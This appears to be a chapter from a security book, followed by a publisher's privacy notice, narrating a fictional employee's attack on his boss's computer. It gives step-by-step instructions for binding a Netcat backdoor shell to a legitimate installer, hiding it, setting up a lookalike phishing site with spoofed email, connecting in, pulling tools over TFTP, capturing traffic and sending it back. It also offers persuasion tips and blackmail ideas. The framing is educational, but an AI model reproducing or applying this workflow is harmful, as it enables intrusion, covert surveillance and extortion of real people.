Home > Articles > Security > General Security and Privacy

This chapter is from the book

The Chained Exploit

This section includes the details of each step in Phoenix’s chained exploit, including

  • Phishing scam
  • Installing executables
  • Setting up the phishing site
  • Sending Mr. Minutia an E-mail
  • Finding the boss’s computer
  • Connecting to the boss’s computer
  • WinPcap
  • Analyzing the packet capture
  • Reassembling the graphic
  • Other possibilities

The section ends with a summary of this chained exploit.

Phishing Scam

Phoenix’s first step is to perform the phishing scam to trick Mr. Minutia into downloading software wrapped with Netcat. Netcat is a backdoor Trojan horse application Phoenix will use to connect to his manager’s computer.

Copying a Legitimate Web Site

First Phoenix needs to find a Web site that he knows will interest his boss. Phoenix has heard his boss talk about how he wants to attempt the Cisco CCNA certification exam, so Phoenix decides to use a Web site called certificationpractice.com that is offering free CCNA practice exam software for a limited time as part of a promotional offer (see Figure 2.7).

Figure 2.7

Figure 2.7 certificationpractice.com Web site

To begin, Phoenix needs to copy down the Web site to his own Web server. One of the more popular utilities for doing this is Wget (www.gnu.org/software/wget/). Wget is a command-line utility with many powerful options (see www.gnu.org/software/wget/manual/wget.html for a list of options). In Phoenix’s case, he chooses the following syntax:

wget -m -r -l 12 www.certificationpractice.com

The switches do the following:

  • -m—Mirror the Web site.
  • -r—Recursively pull down any pages linked to the first page.
  • -l 12—Pull down pages only within 12 hyperlinks of the first page. If Phoenix does not set this to a reasonable boundary, he can end up downloading a significant amount of Web pages. If it is too small, he will not copy enough of the site to replicate it on his server.

This command results in copying the Web site to a directory called www.certificationpractice.com on his local hard drive. This also saves a copy of the ccna.exe executable (see Figure 2.8), which he will bind with a Trojan.

Like many install executables, this software is a zipped executable. Instead of double-clicking the executable, Phoenix unzips it using WinZip. Figure 2.9 shows an example of right-clicking the executable, which brings up a menu with an option to extract the files. Phoenix needs to extract them because he will be using the files contained in the zipped executable to create a new executable wrapped with the back door utility.

Figure 2.9

Figure 2.9 Extracting the executable

After extracting the files, Phoenix renames setup.exe file to another name, such as backup.exe. Phoenix will be creating a new setup.exe later.

Installing Executables

Many install executables contain both a setup.exe file and a setup.lst file that the setup.exe file references. If you rename the setup.exe file to something else, be sure to make a copy of the setup.lst file with the same name. For example, if you rename setup.exe to backup.exe, make a copy of setup.lst called backup.lst.

Binding the Back Door Trojan with the Executable

Binding a Trojan with a legitimate executable is a common method hackers employ to trick users into installing malware onto their computers. These binding programs, also called Trojan wrappers, will combine the original program with a Trojan program and create a new executable. In this example, Phoenix uses Yet Another Binder (YAB), which was originally found at areyoufearless.com. (This site no longer hosts YAB, but you can find this free utility through file-sharing services such as BitTorrent or another hacking Web site such as astalavista.net or packetstormsecurity.org.)

On starting YAB, Phoenix sees the screen shown in Figure 2.10.

Figure 2.10

Figure 2.10 Yet Another Binder

Phoenix clicks the plus sign to bring up the Add Bind File Command screen shown in Figure 2.11.

Figure 2.11

Figure 2.11 Adding Netcat

Phoenix sets up the options in Table 2.1 to prepare his Trojan for binding:

Table 2.1. Yet Another Binder Options




Select command to add:

Bind File

This option enables you to bind a file to another.

Source File Path:


This is the path to Phoenix’s Netcat Trojan.

Execution Method:

Execute asynchronously

This option installs the Trojan separately from the main executable. Sometimes trying to launch them both at the same time (synchronously) might cause problems, so asynchronous execution is a safer option.

Execution Parameters:

-p 50 -e cmd.exe -L

This option configures Netcat to listen (-L) in the background for incoming connections to TCP port 50. The -e cmd.exe option tells Netcat to execute the MS-DOS command shell.

Optionally, Phoenix can select to launch the Trojan again when the computer starts up by setting the Registry Startup Method option. For example, Phoenix can configure it to load in HKEY_LOCAL_MACHINE\Microsoft\Windows\Current Version\Run so that the Trojan will launch every time the computer starts. The default value is not to modify the Registry.

Phoenix clicks OK after he finishes configuring Netcat. Next Phoenix adds the legitimate program by clicking the plus sign again to add it. He selects Execute File in the Select command to add drop-down box (see Figure 2.12). He enters the complete path to the backup.exe executable file, leaves the other options at their default, and then clicks OK.

Figure 2.12

Figure 2.12 Adding the executable

Before Phoenix binds the two files together, he first makes sure that all traces of the Netcat executable will be removed after it launches. This helps to prevent users from detecting his malware on their computer. Trojan wrappers often have this option to melt, or remove, all traces of the malware executable after the software is running in RAM. Although choosing to melt the file is ideal to avoid detection, it does have a side effect: If the file is gone, Phoenix cannot launch it again when the computer starts up. He chooses to melt Netcat by going to the Options menu and choosing Melt Stub After Execution (see Figure 2.13).

Figure 2.13

Figure 2.13 Melt Stub After Execution option

To make this Trojan appear legitimate, Phoenix selects an icon that looks like a standard install program. In the Icon Preview box, he clicks (none) to bring up the Change Icon dialog box. From here, he chooses an icon that looks like a standard install program. Icon 7 and Icon 8 are two good options (see Figure 2.14).

Figure 2.14

Figure 2.14 Choosing an icon

Now Phoenix is ready to bind the stub (Netcat) to the executable (backup.exe). He clicks the Bind File button. He now has his Trojan program, which he saves as setup.exe.

Because the installation is dependent on many other files, Phoenix needs to create a self-extracting archive that bundles all the files necessary for installation. He launches WinZip Self-Extractor and chooses Self-extracting Zip file for Software Installation (see Figure 2.15).

Figure 2.15

Figure 2.15 WinZip self-extractor

Phoenix selects Unzip automatically (see Figure 2.16) so that the archiving is transparent to the user. When the wizard prompts him for the name of the executable to launch when the unzipping process is complete, he chooses setup.exe (see Figure 2.17). When his boss launches the CCNA program, it will unzip the files and run setup.exe, which will install both the legitimate practice test software and Netcat. Netcat will run in the background and listen for incoming connections on TCP (Transmission Control Protocol) port 50.

Figure 2.16

Figure 2.16 Choosing to unzip automatically

Figure 2.17

Figure 2.17 Executing setup.exe on completion

Setting Up the Phishing Site

Phoenix now has created his new program to host on his phishing Web site. He gives his file the same name as the original program (ccna.exe) from the legitimate Web site, and copies it to the same directory where the first ccna.exe was located (overwriting it). He will need to copy all the phishing Web site files to a Web server that can host them. To make the phishing scam appear as legitimate as possible, he decides to register a domain name that is similar to the original Web site. The original Web site is certificationpractice.com, so he registers the domain certification-practice.com. Now he has a fully functional Web site with a name similar to that of the original Web site, along with a new Trojan that appears to be a legitimate practice test application.

Sending Mr.Minutia an E-mail

Phoenix has copied a Web site, created a Trojan, and hosted a new Web site with a link to his Trojan. All of this won’t help him unless he can somehow direct his boss, Mr. Minutia, to visit and download his Trojan. The easiest way to do this is to send a spoofed e-mail to his boss that appears to come from the Web site Phoenix hosts. When his boss looks in the e-mail’s From: field, he should see an e-mail address coming from the certification-practice.com domain and not Phoenix’s e-mail address. Mr. Minutia can discover the real e-mail address only by looking at the e-mail header. Reading the e-mail header is something few people know how to do, and, even if they do, most rarely look at in their e-mail software.

Although Phoenix could send an e-mail using his e-mail client at his workplace, this would make it easy for him to be tracked down in the event that someone does look in the e-mail header. To cover his tracks, he uses an anonymous e-mail service such as mail.com. His steps, then, are as follows:

  1. Register an anonymous e-mail at mail.com.
  2. Create an e-mail that entices his boss to visit the phishing Web site and download the CCNA executable bound with the Trojan.
  3. Change the From: field to an e-mail address with the certification-practice.com domain.

Registering an anonymous e-mail at mail.com is easy. Phoenix goes to www.mail.com and signs up for its free, anonymous e-mail. Unlike many e-mail services that require you to enter an alternative e-mail address, your postal address, or other personal information, sites such as mail.com do not. This anonymity protects Phoenix from investigators being able to track him down.

Next, Phoenix uses the mail.com instructions to configure his e-mail client. He decides on Outlook Express.

You might be wondering why Phoenix needs to have an anonymous e-mail account if he is going to change the From: field. Changing the From: field is enough to trick the user, but not enough to trick an investigator looking in the e-mail header. To hide his identity, Phoenix changes both the From: field and uses an anonymous e-mail service.

Phoenix now creates an e-mail that should be convincing enough to socially engineer his boss into visiting his site and downloading the Trojan. A good phishing scam e-mail should follow these guidelines:

  • The e-mail should be checked for grammatical and spelling mistakes—People are less likely to trust an e-mail with many typographical errors because it appears unprofessional.
  • The e-mail should offer something free—Everyone likes something free.
  • The e-mail should explain why the victims are getting something for nothing—People know that nothing is really “free” and that there must be a catch. Without the justification for the free item, the victims might become suspicious. They might not necessarily think it is a phishing scam, but they might suspect that they are being tricked into something against their will. If a hacker advertises something at no cost, the victims will want to know why they are supposedly getting something free.
  • The e-mail should leave the unsuspecting users feeling good about themselves—The e-mail is essentially a marketing campaign trying to get the victim to download the software. With information technology professionals (such as Phoenix’s boss, in this scenario), the best approach is to leave them feeling that if they use the product they will be smarter and more successful than if they do not use the product.
  • The e-mail should be brief—People are less likely to read a long e-mail than a short one. Phoenix wants to keep the e-mail short to increase the chance of his boss reading it.

The following is a suggested e-mail that meets these objectives:

You might have noticed that the Web site URL is for the legitimate Web site and not the new phishing Web site that Phoenix created. This is intentional. Although Phoenix could have put in his domain name, a good phishing scam appears as legitimate as possible. This e-mail references the original Web site, but Phoenix has changed the HTML code to link to the phishing site. To do this, Phoenix goes to the source code of the e-mail and changes the link to point to his Web site at http://www.certificationpractice.com/ccna (see Figure 2.18). That way the e-mail text refers to the real Web site, but the code directs Phoenix’s boss to the fake Web site. When he’s on Phoenix’s Web site, Mr. Minutia will probably never notice that the Web site is different. And, even if he does, it is close enough to the real Web site domain that he probably will not even care.

Figure 2.18

Figure 2.18 Changing the link

To further encourage his boss, Phoenix approaches him and mentions that he has been thinking about going for the CCNA certification. By mentioning this certification, Phoenix drops a subtle suggestion in his boss’s mind about the certification exam. Gentle suggestions can go a long way toward social engineering the boss into downloading this software. Phoenix remarks, “I received an e-mail from one of those practice test companies today. Did you get one? I haven’t checked it out yet, but it looks like a really good site.” Because Mr. Minutia is a competitive person by nature, Phoenix takes this a step further and entices him to download the software by saying, “You know, I bet you I’ll finish my CCNA before you. I think I’ll go looking for some practice exam software tonight to start preparing.”

Phoenix sends the e-mail, sits back, and waits. After he receives the e-mail, Mr. Minutia will be enticed to download Phoenix’s software. Both the legitimate practice test and Netcat will install on Mr. Minutia’s machine during the installation process. Netcat will be listening on port 50 for Phoenix’s boss’s machine to connect.

Finding the Boss’s Computer

The next step is to discover the IP address used on Mr. Minutia’s computer. One method is to use a software tool called Angry IP Scanner (www.angryziber.com/ipscan/), which scans a range of IP addresses to discover which hosts are active. See Figure 2.19 for an example of scanning the range.

Figure 2.19

Figure 2.19 Angry IP Scanner

Now that Phoenix has a list of hosts on the network, he can use a port scanner to determine which hosts are listening on port 50 (the port he configured Netcat to listen on). Phoenix chooses Angry IP Scanner. Figure 2.20 shows the output of its port scanner. Notice that port 50, the port he specified Netcat to listen on, is open.

Figure 2.20

Figure 2.20 Angry IP Scanner port scanner output

Connecting to the Boss’s Computer

The boss’s computer is Now that Phoenix knows the IP address and has verified that TCP port 50 is open, he can connect to Mr. Minutia’s machine. Phoenix opens an MS-DOS command prompt on his computer and navigates to the directory where he has a copy of Netcat. He types in the following command to connect to his boss’s machine:

nc 50

Phoenix verifies the connection to his boss’s computer using the built-in ipconfig utility. It shows (the IP address of his boss’s computer), so he successfully connected to Mr. Minutia’s computer (as shown in Figure 2.21).

Figure 2.21

Figure 2.21 Connecting to Mr. Minutia’s computer

Phoenix’s next step is to download a packet-capturing software program onto Mr. Minutia’s machine. He decides on a command-line program because he cannot view a graphical user interface (GUI) remotely with Netcat. Because Windows comes with a TFTP client, Phoenix can set up a TFTP server on his computer and download a packet-capturing software program onto Mr. Minutia’s computer. Phoenix uses the TFTP server available at Sysinternals (www.sysinternals.com). Phoenix prefers this software because it is free and he does not need to perform any configuration; simply launching the program is enough. Phoenix also downloads WinDump (www.winpcap.org/windump), a popular packet-capturing program, and places it in the TFTP-Root directory (the default directory used by Sysinternals TFTP server program).

Phoenix goes back to the Netcat connection on his boss’s computer. From there, he downloads WinDump from his computer. The syntax for the Windows TFTP client is

tftp [-i] host [put | get] source destination

The -i switch configures the TFTP client to do a binary transfer (WinDump is a binary file, so this is the appropriate option to use). Phoenix’s IP address is, so he types the following on his boss’s computer to download WinDump:

tftp -i get windump.exe windump.exe

Next Phoenix launches WinDump, which has many options. The options are case sensitive, so he needs to be careful when typing in commands so that he does not mistype and cause the program to hang. Phoenix is concerned only about the following options:

  • -c count—This option captures only a certain number of packets. Without this option, WinDump continues to capture software and fills the log file.
  • -s snaplength—This option specifies the length of the packets captured. Without this option, some packets will be cut off and Phoenix will not be able to reassemble them.
  • -w filename—This option logs all captured packets to a log file.

Typing the following on his boss’s computer will capture up to 1,000 packets and send them to the file capture.log:

windump -c 500 -s 1500 -w capture.log

Now the waiting game begins. Phoenix must wait until his boss sends or receives 500 packets. Phoenix knows when this occurs because WinDump stops running and returns him to a command prompt.


WinDump, like most packet-capturing software, requires the use of the Windows Packet Capture library (WinPcap). WinPcap is available at www.winpcap.org at no cost. Many network utilities use this library, so in a situation like the one in this chapter, chances are good that a network manager working in information technology already has WinPcap installed.

If the network manager does not have WinPcap installed, Phoenix must copy the files and manually install them. Normally, WinPcap uses a graphical install, but using Netcat to connect to a command-line interface of his boss’s computer will not allow Phoenix to view a graphical install utility.

In the event that Phoenix has to install WinPcap using the command line, he takes the following steps:

  1. He downloads WinPcap, but does not install it. Instead, he uses WinZip to unzip the self-extracting executable.
  2. Using TFTP, Phoenix copies daemon_mgm.exe, NetMonInstaller.exe, npf_mgm.exe, rpcapd.exe, and Uninstall.exe to a directory such as C:\Program Files\WinPcap on his boss’s computer.
  3. Copies netnm.pnf to c:\windows\inf.
  4. Copies packet.dll, pthreadvc.dll, wanpacket.dll, and wpcap.dll to c:\windows\system32.
  5. Copies npf.sys to c:\windows\system32\drivers.
  6. Navigates to the directory created in step 2 and runs these commands:

    npf_mgm.exe -r
    daemon_mgm.exe -r
    NetMonInstaller.exe i

Phoenix would now have the Windows Packet Capture library installed on his boss’s computer.

Analyzing the Packet Capture

When WinDump finishes, Phoenix should have captured enough packets to reconstruct whatever his boss has been doing across the network. He doesn’t get too excited, though, because he knows he must first copy the log file over to his computer. He uses TFTP just as he did earlier to transfer the file. This time, though, he will be transferring a file from Mr. Minutia’s computer to his computer. Phoenix types the following command on his boss’s computer to transfer the file:

tftp -i put capture.log

If Phoenix tries to open the log file in a text editor, he will discover it is difficult to read. To make it easier to interpret the output, Phoenix is going to import the log file into Wireshark (formerly Ethereal), which is available at www.wireshark.org. Launching Wireshark, he goes to the File menu, chooses Open, and selects the capture.log file. Figure 2.22 shows sample output of what Phoenix might discover from this file.

Figure 2.22

Figure 2.22 Wireshark

Now Phoenix starts to see something interesting. Notice in the highlighted portion that there is an HTTP (HyperText Transfer Protocol) request to GET a file called gambling.jpg. Could it be that his boss is going to gambling sites during work hours? To find out, Phoenix must follow the TCP stream and reassemble the file.

By right-clicking the HTTP GET request, Phoenix can choose the option follow TCP stream. Doing so brings up the window shown in Figure 2.23.

Figure 2.23

Figure 2.23 Following a TCP stream

The beginning of this output shows an HTTP GET request followed by the response from a Web server. His boss was apparently browsing the Web during the time Phoenix was capturing packets. Phoenix wants to see any graphics that were on the Web page his boss was looking at. Unfortunately, graphics are binary files, so he will not be able to view the image. Phoenix isn’t worried, though, because he can reassemble the image using a hex editor.

Reassembling the Graphics

Phoenix saves the output in its raw format by clicking the Raw option (in the lower-right corner) and then clicking the Save As button. He saves the file as output.raw.

Next he launches WinHex (www.x-ways.net/winhex/), a popular hex editor for Windows, and selects File, Open to open output.raw. Figure 2.24 shows how the raw data appears in WinHex.

Figure 2.24

Figure 2.24 Raw TCP stream in WinHex

This does not look like much just yet, but he will soon re-create the image into its original form. Phoenix knows that he must first remove the HTTP GET request header and leave only the graphics (if there was more HTTP code after the graphics, he would have to remove that as well). To do this, he must remove everything before the start of the binary graphic file. JPEG graphics start with the characters ÿøÿà. Using his mouse, Phoenix highlights all the text in the third column up to ÿøÿà. To remove the HTTP header, he selects the text to remove and then presses Ctrl-x to cut it out of the file. He now has the source graphics file, so he can go to the File menu and choose Save As (shown in Figure 2.25).

Figure 2.25

Figure 2.25 Saving the source graphics file

Next, he opens up the image he just reassembled (see Figure 2.26).

Figure 2.26

Figure 2.26 Image Mr. Minutia was looking at

Aha! It appears his boss might have been looking at an online gambling site during work hours. Phoenix has now confirmed that his boss is setting a double standard: Mr. Minutia expects Phoenix not to surf the Internet during work hours when Phoenix has just confirmed that Mr. Minutia is guilty of surfing the Internet himself. Armed with this knowledge, Phoenix can use it for social engineering, blackmail, or just to joke about it with his coworkers.

Phoenix prints out the image and leaves a copy of it on his boss’s desk the next morning before the boss arrives. Later that day, a memo is sent to all employees saying that Internet usage will no longer be monitored. Phoenix grins as he realizes his plan worked; his boss was caught and will no longer be monitoring his Web surfing.

Other Possibilities

Although the example shows Phoenix’s boss only viewing an online gambling site, the variety of what he might have seen is limitless. What if the boss was looking at pornography? Imagine how Phoenix could have used that to blackmail him or get him fired. In fact, according to a 2005 PC World survey, nearly half of all American Fortune 500 companies have dealt with at least one incident of an employee viewing pornography on their computer at the workplace.

Perhaps instead of online gambling or Internet porn, Phoenix might have been able to capture his boss sending a plaintext password to a Web-based e-mail site. With that password Phoenix could log in as his boss and send e-mails to Mr. Minutia’s friends in his contacts list with lies about him, such as how he wants to confess his drug and alcohol addiction or how he is having an affair.

The possibilities of what Phoenix might discover while spying on his boss are limitless.

Chained Exploit Summary

Let’s review the steps Phoenix used for this chained exploit:

  1. He copied down a legitimate Web site to set up a phishing scam.
  2. He used a Trojan wrapper to combine Netcat with legitimate software.
  3. He hosted a new Web site and sent a spoofed e-mail to his boss.
  4. He scanned his network to find the IP address of his boss’s computer.
  5. He connected to his boss’s computer via Netcat and, using TFTP, downloaded WinDump.
  6. He captured packets being sent to and from his boss’s computer while his boss surfed the Internet.
  7. He copied the captured packets back to his computer and opened them using Wireshark.
  8. Upon seeing that there was a graphic being transferred, he saved the output as raw data and opened it in WinHex.
  9. Using WinHex, he removed the HTTP header, saved the original graphics file, and opened it.

InformIT Promotional Mailings & Special Offers

I would like to receive exclusive offers and hear about products from InformIT and its family of brands. I can unsubscribe at any time.


Pearson Education, Inc., 221 River Street, Hoboken, New Jersey 07030, (Pearson) presents this site to provide information about products and services that can be purchased through this site.

This privacy notice provides an overview of our commitment to privacy and describes how we collect, protect, use and share personal information collected through this site. Please note that other Pearson websites and online products and services have their own separate privacy policies.

Collection and Use of Information

To conduct business and deliver products and services, Pearson collects and uses personal information in several ways in connection with this site, including:

Questions and Inquiries

For inquiries and questions, we collect the inquiry or question, together with name, contact details (email address, phone number and mailing address) and any other additional information voluntarily submitted to us through a Contact Us form or an email. We use this information to address the inquiry and respond to the question.

Online Store

For orders and purchases placed through our online store on this site, we collect order details, name, institution name and address (if applicable), email address, phone number, shipping and billing addresses, credit/debit card information, shipping options and any instructions. We use this information to complete transactions, fulfill orders, communicate with individuals placing orders or visiting the online store, and for related purposes.


Pearson may offer opportunities to provide feedback or participate in surveys, including surveys evaluating Pearson products, services or sites. Participation is voluntary. Pearson collects information requested in the survey questions and uses the information to evaluate, support, maintain and improve products, services or sites, develop new products and services, conduct educational research and for other purposes specified in the survey.

Contests and Drawings

Occasionally, we may sponsor a contest or drawing. Participation is optional. Pearson collects name, contact information and other information specified on the entry form for the contest or drawing to conduct the contest or drawing. Pearson may collect additional personal information from the winners of a contest or drawing in order to award the prize and for tax reporting purposes, as required by law.


If you have elected to receive email newsletters or promotional mailings and special offers but want to unsubscribe, simply email information@informit.com.

Service Announcements

On rare occasions it is necessary to send out a strictly service related announcement. For instance, if our service is temporarily suspended for maintenance we might send users an email. Generally, users may not opt-out of these communications, though they can deactivate their account information. However, these communications are not promotional in nature.

Customer Service

We communicate with users on a regular basis to provide requested services and in regard to issues relating to their account we reply via email or phone in accordance with the users' wishes when a user submits their information through our Contact Us form.

Other Collection and Use of Information

Application and System Logs

Pearson automatically collects log data to help ensure the delivery, availability and security of this site. Log data may include technical information about how a user or visitor connected to this site, such as browser type, type of computer/device, operating system, internet service provider and IP address. We use this information for support purposes and to monitor the health of the site, identify problems, improve service, detect unauthorized access and fraudulent activity, prevent and respond to security incidents and appropriately scale computing resources.

Web Analytics

Pearson may use third party web trend analytical services, including Google Analytics, to collect visitor information, such as IP addresses, browser types, referring pages, pages visited and time spent on a particular site. While these analytical services collect and report information on an anonymous basis, they may use cookies to gather web trend information. The information gathered may enable Pearson (but not the third party web trend services) to link information with application and system log data. Pearson uses this information for system administration and to identify problems, improve service, detect unauthorized access and fraudulent activity, prevent and respond to security incidents, appropriately scale computing resources and otherwise support and deliver this site and its services.

Cookies and Related Technologies

This site uses cookies and similar technologies to personalize content, measure traffic patterns, control security, track use and access of information on this site, and provide interest-based messages and advertising. Users can manage and block the use of cookies through their browser. Disabling or blocking certain cookies may limit the functionality of this site.

Do Not Track

This site currently does not respond to Do Not Track signals.


Pearson uses appropriate physical, administrative and technical security measures to protect personal information from unauthorized access, use and disclosure.


This site is not directed to children under the age of 13.


Pearson may send or direct marketing communications to users, provided that

  • Pearson will not use personal information collected or processed as a K-12 school service provider for the purpose of directed or targeted advertising.
  • Such marketing is consistent with applicable law and Pearson's legal obligations.
  • Pearson will not knowingly direct or send marketing communications to an individual who has expressed a preference not to receive marketing.
  • Where required by applicable law, express or implied consent to marketing exists and has not been withdrawn.

Pearson may provide personal information to a third party service provider on a restricted basis to provide marketing solely on behalf of Pearson or an affiliate or customer for whom Pearson is a service provider. Marketing preferences may be changed at any time.

Correcting/Updating Personal Information

If a user's personally identifiable information changes (such as your postal address or email address), we provide a way to correct or update that user's personal data provided to us. This can be done on the Account page. If a user no longer desires our service and desires to delete his or her account, please contact us at customer-service@informit.com and we will process the deletion of a user's account.


Users can always make an informed choice as to whether they should proceed with certain services offered by InformIT. If you choose to remove yourself from our mailing list(s) simply visit the following page and uncheck any communication you no longer want to receive: www.informit.com/u.aspx.

Sale of Personal Information

Pearson does not rent or sell personal information in exchange for any payment of money.

While Pearson does not sell personal information, as defined in Nevada law, Nevada residents may email a request for no sale of their personal information to NevadaDesignatedRequest@pearson.com.

Supplemental Privacy Statement for California Residents

California residents should read our Supplemental privacy statement for California residents in conjunction with this Privacy Notice. The Supplemental privacy statement for California residents explains Pearson's commitment to comply with California law and applies to personal information of California residents collected in connection with this site and the Services.

Sharing and Disclosure

Pearson may disclose personal information, as follows:

  • As required by law.
  • With the consent of the individual (or their parent, if the individual is a minor)
  • In response to a subpoena, court order or legal process, to the extent permitted or required by law
  • To protect the security and safety of individuals, data, assets and systems, consistent with applicable law
  • In connection the sale, joint venture or other transfer of some or all of its company or assets, subject to the provisions of this Privacy Notice
  • To investigate or address actual or suspected fraud or other illegal activities
  • To exercise its legal rights, including enforcement of the Terms of Use for this site or another contract
  • To affiliated Pearson companies and other companies and organizations who perform work for Pearson and are obligated to protect the privacy of personal information consistent with this Privacy Notice
  • To a school, organization, company or government agency, where Pearson collects or processes the personal information in a school setting or on behalf of such organization, company or government agency.


This web site contains links to other sites. Please be aware that we are not responsible for the privacy practices of such other sites. We encourage our users to be aware when they leave our site and to read the privacy statements of each and every web site that collects Personal Information. This privacy statement applies solely to information collected by this web site.

Requests and Contact

Please contact us about this Privacy Notice or if you have any requests or questions relating to the privacy of your personal information.

Changes to this Privacy Notice

We may revise this Privacy Notice through an updated posting. We will identify the effective date of the revision in the posting. Often, updates are made to provide greater clarity or to comply with changes in regulatory requirements. If the updates involve material changes to the collection, protection, use or disclosure of Personal Information, Pearson will provide notice of the change through a conspicuous notice on this site or other appropriate way. Continued use of the site after the effective date of a posted revision evidences acceptance. Please contact us if you have questions or concerns about the Privacy Notice or any objection to any revisions.

Last Update: November 17, 2020